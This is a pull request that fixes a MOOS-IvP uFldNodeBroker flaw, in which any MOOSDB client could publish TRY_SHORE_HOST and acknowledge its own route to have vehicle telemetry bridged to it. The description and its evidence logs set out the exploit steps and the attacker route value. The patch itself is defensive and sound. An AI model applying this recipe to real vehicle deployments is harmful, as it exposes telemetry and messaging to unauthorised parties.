### PR TITLE
uFldNodeBroker: make runtime shore routes opt in

### DIFF
--- a/ivp/src/uFldNodeBroker/NodeBroker.cpp
+++ b/ivp/src/uFldNodeBroker/NodeBroker.cpp
@@ -38,6 +38,11 @@ using namespace std;
 
 NodeBroker::NodeBroker()
 { 
+  // A TRY_SHORE_HOST arriving on the bus adds a shore route and makes this
+  // node bridge its configured variables to it, and any MOOSDB client can
+  // publish that variable, so accepting one is opt in.
+  m_accept_try_shore_host = false;
+
   // Initialize State Variables
   m_pshare_cmd_posted = 0;
   m_pings_posted      = 0;
@@ -85,11 +90,18 @@ bool NodeBroker::OnNewMail(MOOSMSG_LIST &NewMail)
       checkMessagingPolicy(sval);
     
     else if(key == "TRY_SHORE_HOST") {
-      bool handled = handleConfigTryShoreHost(sval, false);
-      if(!handled)
-	reportRunWarning("Invalid incoming TRY_SHORE_HOST:"+sval);
-      else
-	registerPingBridges(true);
+      if(!m_accept_try_shore_host) {
+	reportRunWarning("Ignored TRY_SHORE_HOST from " + msg.GetSource() +
+			 ": set accept_try_shore_host = true to allow"
+			 " shore routes to be added at runtime");
+      }
+      else {
+	bool handled = handleConfigTryShoreHost(sval, false);
+	if(!handled)
+	  reportRunWarning("Invalid incoming TRY_SHORE_HOST:"+sval);
+	else
+	  registerPingBridges(true);
+      }
     }
 
     // Only accept an ACK coming from a different community
@@ -162,7 +174,9 @@ bool NodeBroker::OnStartUp()
     string value = line;
 
     bool handled = false;
-    if(param == "try_shore_host") 
+    if(param == "accept_try_shore_host")
+      handled = setBooleanOnString(m_accept_try_shore_host, value);
+    else if(param == "try_shore_host") 
       handled = handleConfigTryShoreHost(value);
     else if(param == "bridge") 
       handled = handleConfigBridge(value);
@@ -448,9 +462,15 @@ void NodeBroker::handleMailAck(string ack_msg)
   HostRecord hrecord = string2HostRecord(ack_msg);
 
   string new_key = hrecord.getKey();
-  unsigned int key_ix = atoi(new_key.c_str());
 
-  if((new_key == "") || !isNumber(new_key) || (key_ix >= m_shore_routes.size())) {
+  // atoi() on a non numeric or negative key still gives a value which then
+  // indexes five parallel vectors, so test the string before converting it
+  // and treat a negative index as bad.
+  int key_int = atoi(new_key.c_str());
+  unsigned int key_ix = (key_int < 0) ? 0 : (unsigned int)key_int;
+
+  if((new_key == "") || !isNumber(new_key) || (key_int < 0) ||
+     (key_ix >= m_shore_routes.size())) {
     m_bad_acks_received++;
     
     string msg = "NODE_BROKER_ACK recvd from " + hrecord.getHostIP();

--- a/ivp/src/uFldNodeBroker/NodeBroker.h
+++ b/ivp/src/uFldNodeBroker/NodeBroker.h
@@ -68,6 +68,12 @@ class NodeBroker : public AppCastingMOOSApp
   // Index on below vectors is a host to try as shoreside
   std::vector<std::string>  m_shore_community;
   std::vector<std::string>  m_shore_routes;
+
+  // May a TRY_SHORE_HOST arriving on the bus add a shore route?  Off unless
+  // the mission file asks for it: any client of the MOOSDB can publish that
+  // variable, and a new route makes this node bridge its configured
+  // variables to the address in it.
+  bool m_accept_try_shore_host;
   std::vector<unsigned int> m_shore_pings_sent;
   std::vector<unsigned int> m_shore_pings_ack;
   std::vector<std::string>  m_shore_ipaddr;


### PR DESCRIPTION
# uFldNodeBroker: make runtime shore routes opt in

NodeBroker messages can enroll an attacker-controlled shore route

## Problem

`TRY_SHORE_HOST` arriving on the bus is handled with no check on who published
it (`ivp/src/uFldNodeBroker/NodeBroker.cpp:87-93`):

```
else if(key == "TRY_SHORE_HOST") {
  bool handled = handleConfigTryShoreHost(sval, false);
  ...
  registerPingBridges(true);
}
```

`handleConfigTryShoreHost()` (`:391-437`) validates only that the route parses
and is not a duplicate, so any MOOSDB client can add a shore route. The node
then pings it, and the acknowledgement's only check is a vector index taken from
the ack itself (`:445-476`):

```
unsigned int key_ix = atoi(hrecord.getKey());
if(... || (key_ix >= m_shore_routes.size())) ...
```

so the attacker can claim the slot it just created, and `registerUserBridges()`
(`:312-330`) starts bridging every configured variable to its address.

## Impact

An unauthenticated MOOS client makes the vehicle enrol with a shore of its
choosing and bridge its telemetry there: `NODE_REPORT_LOCAL`,
`NODE_MESSAGE_LOCAL`, `APPCAST`, `REALMCAST` and `NODE_PSHARE_VARS` were all
observed arriving at the attacker's UDP port.

## Fix

* `accept_try_shore_host`, default false: a `TRY_SHORE_HOST` on the bus is
  ignored and logged with the publisher's name unless a mission file turns it
  on. Routes configured statically with `try_shore_host` are unaffected, which
  is how shore routes are normally set.
* `handleMailAck()` tests the key string before converting it and treats a
  negative index as bad. `atoi()` on a non numeric or negative key previously
  produced a value that still indexed five parallel vectors.

## Files touched

* `ivp/src/uFldNodeBroker/NodeBroker.h`: add `m_accept_try_shore_host`
* `ivp/src/uFldNodeBroker/NodeBroker.cpp`: gate `TRY_SHORE_HOST` from the bus, read the new parameter, harden the ack key

## Evidence

Before, stock build of the unpatched revision:

```
Exploit against a node broker with one statically configured route:

  [1] TRY_SHORE_HOST = pshare_route=127.0.0.1:19996
        cmd=output,src_name=NODE_BROKER_PING_0,...,route=192.168.1.1:9200
        cmd=output,src_name=NODE_BROKER_PING_1,...,route=127.0.0.1:19996
  [2] NODE_BROKER_ACK
        cmd=output,src_name=APPCAST,...,route=127.0.0.1:19996
        cmd=output,src_name=NODE_MESSAGE_LOCAL,...,route=127.0.0.1:19996
        cmd=output,src_name=NODE_REPORT_LOCAL,...,route=127.0.0.1:19996
        cmd=output,src_name=NODE_PSHARE_VARS,...,route=127.0.0.1:19996
        cmd=output,src_name=REALMCAST,...,route=127.0.0.1:19996
```

After, same test against this branch:

```
Same exploit, default configuration:

  [1] TRY_SHORE_HOST = pshare_route=127.0.0.1:19996
        cmd=output,src_name=NODE_BROKER_PING_0,...,route=192.168.1.1:9200
  [2] NODE_BROKER_ACK
        (nothing)

Only the statically configured route exists, and nothing is bridged to the
attacker. With `accept_try_shore_host = true` the previous behaviour is
available again.
```

## Notes

The ack key remains an index rather than anything an attacker cannot guess. That
matters much less once a route cannot be added from the bus, because the only
slots that exist are the ones the mission file created; making the ack carry
something bound to the ping it answers would be the next step.
